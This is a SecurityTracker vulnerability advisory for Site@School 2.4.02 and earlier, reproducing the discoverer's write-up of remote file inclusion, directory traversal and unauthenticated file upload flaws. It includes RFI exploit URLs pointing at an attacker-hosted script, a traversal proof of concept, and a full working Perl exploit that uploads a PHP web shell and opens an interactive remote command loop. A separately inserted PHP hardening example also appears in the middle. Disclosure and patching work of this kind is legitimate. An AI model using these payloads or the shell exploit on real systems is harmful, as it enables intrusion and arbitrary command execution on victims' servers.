SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Site@School Vendors:   siteatschool.sourceforge.net
Site@School Input Validation Flaws Let Remote Users View Files and Execute Arbitrary Code
SecurityTracker Alert ID:  1016887
SecurityTracker URL:  http://securitytracker.com/id/1016887
CVE Reference:   CVE-2006-4919, CVE-2006-4920, CVE-2006-4921, CVE-2006-4922   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Sep 20 2006
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.4.02 and prior versions
Description:   A vulnerability was reported in Site@School. A remote user can include and execute arbitrary code on the target system. A remote user can view files on the target system.

The 'starnet/modules/sn_allbum/slideshow.php' script does not properly validate user-supplied input in the 'cmsdir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Other files are also affected, including 'starnet/modules/include/include.php' and 'starnet/themes/editable/main.inc.php'.

The 'starnet/editors/htmlarea/popups/images.php' script does not properly validate user-supplied input in the 'dir' parameter. A remote user can supply a specially crafted request to view files on the target system.

A demonstration exploit URL is provided:

http://[target]/starnet/editors/htmlarea/popups/images.php?dir=../../

A remote user can exploit 'starnet/editors/htmlarea/popups/images.php' to upload arbitrary PHP code. The PHP code can then be executed via the web server.

The vendor was notified on August 5, 2006.

Simo64 discovered this vulnerability.

The original advisory is available at:

http://www.morx.org/school.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can view files on the target system.

Solution:   The vendor has issued a fixed version (2.4.03).
Vendor URL:  siteatschool.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Date:  Fri, 15 Sep 2006 15:09:01 +0000
Subject:  Site@School 2.4.02 and below Multiple remote Command Execution

# Title: Site@School 2.4.02 and below Multiple remote Command Execution Vulnerabilities
# Vendor: Site@School
# website : http://siteatschool.sourceforge.net/
# Version : <= 2.4.02
# Severity: Critical
# Discovered by: Simo64 <simo64_at_morx_org>
# Exploit written by: Simo Ben youssef <simo_at_morx_org>
# Discovered: 05 August 2006
# Published : 15 September 2006
# MorX Security Research Team
# http://www.morx.org
# Original File: http://www.morx.org/school.txt

# Details

# Remote File Inclusion :

# vulnerable code in starnet/modules/sn_allbum/slideshow.php near line 39 - 46:

# [code]
# ------------------------------------------------------------------
# if(file_exists("$cmsdir/languages/$language/sn_allbum/$language.php"))
# {
# 	  include("$cmsdir/languages/$language/sn_allbum/$language.php");
# }
# else
# {
#	 include("$cmsdir/languages/EN/sn_allbum/EN.php");
# }
# -------------------------------------------------------------------[/code]

# vulnerable code in line 91 :

# [code]
# ----------------------------------------------------------------
#	 include("$cmsdir/themes/$themelocation/".$content_parm[0]);
# ------------------------------------------------------------------[/code]

# $cmsdir is not properly verified and can be used to include files from remote
# resources, which would allow a remote attacker to execute arbitrary commands with the
# privilege of the webserver

# Note : multiple files are affected !

# Exploit :

# http://localhost/starnet/modules/sn_allbum/slideshow.php?cmsdir=http://attacker/evilscript.txt?cmd=ls
# http://localhost/starnet/modules/include/include.php?cmsdir=http://attacker/evilscript.txt?cmd=ls
# http://localhost/starnet/themes/editable/main.inc.php?cmsdir=http://attacker/evilscript.txt?cmd=ls

# =======================
# Directory Traversal   :
# =======================

# PoC :

# http://localhost/starnet/editors/htmlarea/popups/images.php?dir=../../

# =======================
# Arbitrary File Upload :
# =======================

# vulnerable code in starnet/editors/htmlarea/popups/images.php near lines 58 - 104

# [code]
# ----------------------------------------------------------
# $BASE_DIR = $server_path;
# $BASE_ROOT = $user_path.'/'.$media ;

# if(isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath']))
# {

#	 $dirPathPost = $_POST['dirPath'];
#	 if(strlen($dirPathPost) > 0)
#	 {
#		 if(substr($dirPathPost,0,1)=='/')
#			 $IMG_ROOT .= $dirPathPost;
#		 else
#			 $IMG_ROOT = $dirPathPost;
#	 }

#	 if(strrpos($IMG_ROOT, '/')!= strlen($IMG_ROOT)-1)
#		 $IMG_ROOT .= '/';

#	 do_upload($_FILES['upload'], $BASE_DIR.$BASE_ROOT.$dirPathPost.'/');
# }

# /*[morx] do_upload function code [/morx]*/

# function do_upload($file, $dest_dir)
# {
# 	global $clearUploads, $perm;

# 	if(is_file($file['tmp_name']))
#	 {
#         # Remove spaces, apostrophe, exclamation marks etc.
#         $str_from = " \'@!,/\\\t\*?`\"" ;
#         $str_to = str_repeat("_",strlen($str_from));
#         $file_name = strtr($file['name'],$str_from,$str_to);
#		 //var_dump($file); echo "DIR:$dest_dir";
#		 move_uploaded_file($file['tmp_name'], $dest_dir.$file_name);
#	 	 //get filepermissions from config and chmod it.
#		 eval("chmod('$dest_dir.$file_name', $perm);");
#	 }

#	 $clearUploads = true;
# }

# ---------------------------------------------------------[/code]

# the first problem is that starnet/editors/htmlarea/popups/images.php is accessible
# directly to any user without any authentication,
# the second problem is that the script doesn't verify the file extension, so an attacker needs just to complete the
# condition in line 88 to upload a malicious script
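An added hardening example for the two code paths quoted above (the $cmsdir include in slideshow.php and the do_upload handler in images.php); it is not Site@School code or part of the advisory, and CMSDIR, the $_SESSION['user_id'] key, language_file and upload_image are assumed names:

```php
<?php
// Added hardening example (not Site@School code): the include base path is a
// constant, the language code is allow-listed, and the upload handler requires a
// login, confines dirPath to the media root and allows only image files.

// Assumed install-time path; the point is that it never comes from the request.
define('CMSDIR', '/var/www/siteatschool/starnet');

// Replacement for the slideshow.php include: no user-controlled $cmsdir.
function language_file(string $language): string {
    if (!preg_match('/^[A-Z]{2}$/', $language)) {   // e.g. "EN"; rejects ../ and URLs
        $language = 'EN';
    }
    $file = CMSDIR . "/languages/$language/sn_allbum/$language.php";
    return is_file($file) ? $file : CMSDIR . '/languages/EN/sn_allbum/EN.php';
}

// Replacement for the images.php upload path; $mediaRoot is $BASE_DIR.$BASE_ROOT.
function upload_image(array $file, string $dirPath, string $mediaRoot): string {
    if (empty($_SESSION['user_id'])) {              // assumed session key set at login
        throw new RuntimeException('login required');
    }
    $root = realpath($mediaRoot);
    $dest = realpath($root . '/' . ltrim($dirPath, '/'));
    // realpath() resolves "../", so a traversal no longer starts with $root.
    if ($root === false || $dest === false || strpos($dest . '/', $root . '/') !== 0) {
        throw new RuntimeException('destination outside media root');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif', 'jpg', 'jpeg', 'png'], true)) {
        throw new RuntimeException('file type not allowed');   // blocks .php, .phtml, ...
    }
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an image');
    }
    // Server-chosen name: the client's filename never reaches the filesystem.
    $target = $dest . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('upload failed');
    }
    chmod($target, 0644);   // a plain call; no eval() of a config string
    return $target;
}
```

Serving the media directory with script execution disabled (for example, no PHP handler for that path) is the second layer; the extension and content checks above are the first.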


# Disclosure History:

# 05 August 2006 : Discovered
# 05 August 2006 : Contacted Vendor with vulnerabilities information
# 23 August 2006 : Vendor released 2.4.03

# Patch:

# Upgrade to the latest version.

# Exploit :
# =========
# [code]

# C:\>perl school.pl localhost

# --- Site@school remote file upload Xploit
# --- Writting By Simo ben youssef / Simo_at_morx_org
# --- MorX Security Research Team
# --- www.morx.org

# [*] checking if zebi.php was successfully uploaded ...
# [+] zebi.php was successfully uploaded

# ####################################
# ####     ET VOILA, YOU ARE IN  #####
# ####################################

# Linux localhost 2.6.12.6-xenU #1 SMP Sun Dec 4 20:49:44 GMT 2005 x86_64 GNU/Linux

# uid=33(www-data) gid=33(www-data) groups=33(www-data)

# [www-data@localhost:]#exit
# Connection Closed

use IO::Socket;
use LWP::Simple;

if(!defined($ARGV[0])) {

print "\n--- Site\@school remote file upload Xploit\n";
print "--- Writting By Simo ben youssef / Simo_at_morx_org\n";
print "--- MorX Security Research Team\n";
print "--- www.morx.org\n\n";

print "--- Usage:   perl $0 <host>\n";
print "--- Example: perl $0 localhost\n\n";
exit; }

$TARGET = $ARGV[0];
$PORT   = "80";
$SCRIPT = "starnet/editors/htmlarea/popups/images.php";
$SHELL  = "/starnet/media/zebi.php?cmd=";
$HTTP   = "http://";
$a      = 0;   # set to 1 once the upload check succeeds

# Request headers and multipart body for the POST to images.php.
# The boundary in the Content-Type header is the body delimiter without its leading "--".
$COMMAND1 = "POST /$SCRIPT HTTP/1.1";
$COMMAND2 = "Accept: image/gif, image/x-xbitmap, image/jpeg,  image/pjpeg, application/x-shockwave-flash, */*";
$COMMAND3 = "Accept-Language: en-us";
$COMMAND4 = "Content-Type: multipart/form-data; boundary=---------------------------7d62e2819048c2";
$COMMAND5 = "Accept-Encoding: gzip, deflate";
$COMMAND6 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;  Windows NT 5.1)";
$COMMAND7 = "Host: $TARGET";
$COMMAND8 = "Content-Length: 438";
$COMMAND9 = "Connection: Keep-Alive";
$COMMAND9a = "Cache-Control: no-cache";
$COMMAND10 = "-----------------------------7d62e2819048c2";
$COMMAND11 = 'Content-Disposition: form-data; name="dirPath"';
$COMMAND12 = "/";
$COMMAND13 = 'Content-Disposition: form-data; name="upload";  filename="C:\zebi.php"';
$COMMAND14 = "Content-Type: application/octet-stream";
$COMMAND15 = "<? system(\$_GET['cmd']\);exit; ?>";
$COMMAND16 = 'Content-Disposition: form-data; name="upload"';
$COMMAND17 = "Upload";
$COMMAND18 = "-----------------------------7d62e2819048c2--";
$COMMAND19 = "HEAD /starnet/media/zebi.php HTTP/1.1";

$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";

print "\n--- Site\@school remote file upload Xploit\n";
print "--- Writting By Simo ben youssef / Simo_at_morx_org\n";
print "--- MorX Security Research Team\n";
print "--- www.morx.org\n\n";

print "[*] Trying to upload zebi.php ...\n\n";

sleep 2;
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n$COMMAND4\n$COMMAND5\n$COMMAND6\n$COMMAND7\n$COMMAND8\n$COMMAND9\n$COMMAND9a\n\n";

print $remote "$COMMAND10\n$COMMAND11\n\n$COMMAND12\n$COMMAND10\n$COMMAND13\n$COMMAND14\n\n$COMMAND15\n$COMMAND10\n$COMMAND16\n\n$COMMAND17\n$COMMAND18\n\n";

print "[*] checking if zebi.php was successfully uploaded ...\n";

# A HEAD request on the expected path: a 200 response means the file was stored.
print $remote "$COMMAND19\n$COMMAND7\n$COMMAND9\n$COMMAND9a\n\n";

while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print "[+] zebi.php was successfully uploaded\n\n";

$cmd2   = "uname -n";
$cmd3   = "whoami";
$cmd4   = "uname -a";
$cmd5   = "id";
$unamea = "$HTTP$TARGET$SHELL$cmd4";
$id     = "$HTTP$TARGET$SHELL$cmd5";
$uname  = "$HTTP$TARGET$SHELL$cmd2";
$whoami = "$HTTP$TARGET$SHELL$cmd3";
$w      = get($whoami);
$u      = get($uname);
chomp($w);
chomp($u);
$ua     = get($unamea);
$i      = get($id);
print "####################################\n";
print "####     ET VOILA, YOU ARE IN  #####\n";
print "####################################\n\n";

print "$ua\n$i";

# Interactive loop: each line typed is fetched as the cmd parameter of the uploaded script.
while () {

print "\n[$w\@$u:]#";

chomp($cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Connection Closed\n";
$remote->flush();
close($remote);
exit;
}

$LEHWA   = "$HTTP$TARGET$SHELL$cmd";

if($cmd eq "")
{
print "empty command ! for help, type help\n"; }
else
{
getprint($LEHWA)
}
}
$a = 1
}
}

if ($a == 0)
{ print "[-] failed\n";
}
$remote->flush();
close($remote);
exit;

# Disclaimer:

# This entire document is for educational, testing and demonstration purposes only.
# Modification, use and/or publishing of this information is entirely at your OWN risk.
# I cannot be held responsible for any of the above.

Copyright 2014, SecurityGlobal.net LLC